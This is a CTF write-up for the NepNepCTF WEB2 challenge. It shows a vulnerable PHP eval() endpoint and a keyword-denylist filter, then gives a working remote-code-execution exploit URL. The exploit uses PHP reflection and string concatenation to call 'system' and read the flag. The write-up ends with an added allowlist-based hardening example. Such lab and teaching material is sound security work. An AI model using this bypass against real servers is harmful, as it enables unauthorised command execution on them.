NepNepCTF WEB2
- This was an unintended solution at the time. A brief write-up of RCE through PHP reflection.
The core of the challenge code:

```php
<?php
highlight_file(__FILE__);
function waf($s) {
return preg_replace('/sys|exec|sh|flag|pass|file|open|dir|2333|;|#|\/\/|>/i', "NepnEpneP", $s);
}
if(isset($_GET['a'])) {
$_ = waf($_GET['a']);
$__ = waf($_GET['b']);
$a = new $_($__);
} else {
$a = new Error('?');
}
if(isset($_GET['c']) && isset($_GET['d'])) {
$c = waf($_GET['c']);
$d = waf($_GET['d']);
eval("\$a->$c($d);");
} else {
$c = "getMessage";
$d = "";
eval("echo \$a->$c($d);");
}
?>
```
- With a small change, the demo from the PHP reflection documentation can call any function:

```php
<?php
$function = new ReflectionFunction('system');
echo $function->invoke("whoami");
?>
```
- But the challenge filters keywords such as `sys`, so another route is needed: use `invokeArgs` together with `call_user_func`, and build the function name by string concatenation. The filter only sees the literal substrings of the request, while the real name is only assembled at runtime, so the check is bypassed and arbitrary code runs. For example:

```php
<?php
$function = new ReflectionFunction('call_user_func');
echo $function->invokeArgs(array('s'.'y'.'s'.'tem','whoami'));
?>
```
- EXP
```text
index.php?a=ReflectionFunction&b=call_user_func&c=invokeArgs&d=array(%27s%27.%27y%27.%27s%27.%27tem%27,%27cat%20/f%27.%27lag%27)
```
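As an added example (not part of the original write-up or the challenge), the following shows the two defensive points the bypass above illustrates: the denylist in `waf()` cannot see a name that is only assembled at runtime, and the fix is an allowlist of the classes and methods the application actually needs, with no `eval()` over request data. The allowed class and method names are assumptions chosen to match the challenge's own default (`Error` / `getMessage`).

```php
<?php
// Added example, not the challenge code. Demonstrates why the substring
// denylist fails and what an allowlist-based replacement looks like.

// The challenge's denylist, reproduced: it only matches literal substrings.
function waf($s) {
    return preg_replace('/sys|exec|sh|flag|pass|file|open|dir|2333|;|#|\/\/|>/i', "NepnEpneP", $s);
}

// A name built by concatenation contains no forbidden substring as text,
// so the filter returns it unchanged; the "bad" string only exists after
// PHP evaluates the expression, i.e. after the filter has already run.
$concatenated = "array('s'.'y'.'s'.'tem','id')";
var_dump(waf($concatenated) === $concatenated);   // bool(true): nothing was replaced

// Hardened approach: accept only known-good names and never eval() input.
// Assumption: these are the only classes/methods the application needs.
$allowedClasses = ['Error', 'Exception'];
$allowedMethods = ['getMessage', 'getCode'];

function buildObject(string $class, string $arg, array $allowed): object {
    // Strict comparison against an allowlist; a class like ReflectionFunction
    // is rejected before it is ever instantiated.
    if (!in_array($class, $allowed, true)) {
        throw new InvalidArgumentException('class not allowed');
    }
    return new $class($arg);
}

function callMethod(object $obj, string $method, array $allowed) {
    if (!in_array($method, $allowed, true)) {
        throw new InvalidArgumentException('method not allowed');
    }
    // Direct dynamic call: the method name is a vetted literal and the
    // request never reaches eval(), so no argument is parsed as PHP source.
    return $obj->$method();
}

try {
    $obj = buildObject($_GET['a'] ?? 'Error', $_GET['b'] ?? '?', $allowedClasses);
    echo callMethod($obj, $_GET['c'] ?? 'getMessage', $allowedMethods);
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo 'rejected: ' . $e->getMessage();
}
```

With this version the original payload (`a=ReflectionFunction&c=invokeArgs&d=...`) is refused at the class check, and the `d` parameter is never interpreted at all, because there is no `eval()` left for it to reach.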